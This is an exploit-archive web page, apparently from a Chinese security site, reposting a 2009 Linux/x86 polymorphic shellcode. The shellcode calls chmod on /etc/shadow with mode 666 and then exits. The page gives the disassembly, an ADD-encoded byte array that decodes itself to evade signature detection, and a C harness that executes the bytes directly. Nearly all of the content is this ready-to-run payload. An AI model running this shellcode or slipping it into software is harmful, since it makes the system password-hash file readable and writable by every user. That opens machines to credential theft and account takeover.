首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes
来源:submit [!] shell-storm.org 作者:Salwan 发布时间:2009-06-24  
/*
Title : Linux/x86 - Shellcode Polymorphic chmod("/etc/shadow",666) & exit() - 54 bytes
Encode  : _ADD

Author : Jonathan Salwan
Mail : submit [!] shell-storm.org


! Database of shellcodes => http://www.shell-storm.org/shellcode/


Informations  _chmod() & _exit():
================================

%eax = 15
   %ebx = /etc/shadow
   %ecx = 666

        %eax = 1
        %ebx = 0

Disassembly of section .text:

08048054 <.text>:
8048054: 51                   push   %ecx
8048055: 66 b9 b6 01          mov    $0x1b6,%cx
8048059: 68 61 64 6f 77       push   $0x776f6461
804805e: 68 63 2f 73 68       push   $0x68732f63
8048063: 68 2f 2f 65 74       push   $0x74652f2f
8048068: 89 e3                mov    %esp,%ebx
804806a: 6a 0f                push   $0xf
804806c: 58                   pop    %eax
804806d: cd 80                int    $0x80
804806f: 40                   inc    %eax
8048070: cd 80                int    $0x80

*/


#include "stdio.h"

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80"
"\x6c\x0e\xff\x23\x80\xe9\x01\x75"
  "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x74\x89\xdc\xd9\x24\x8b\x84\x87"
"\x92\x9a\x8b\x86\x52\x96\x8b\x8b"
"\x52\x52\x88\x97\xac\x06\x8d\x32"
"\x7b\xf0\xa3\x63\xf0\xa3";

int main()
{
printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();

return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zen Cart 1.3.8 Remote Code Exe
·Bopup Communications Server 3.
·Zen Cart 1.3.8 Remote SQL Exec
·MyBB <= 1.4.6 Remote Code Exec
·HP Data Protector 4.00-SP1b430
·Multiple HTTP Server Low Bandw
·HP Data Protector 4.00-SP1b430
·pmaPWN! - phpMyAdmin Code Inje
·The Cisco ASA Web VPN versions
·Safari 3.2.3 Arbitrary Code Ex
·Joomla Component com_pinboard
·Multiple Exploiting IE8/IE7 XS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved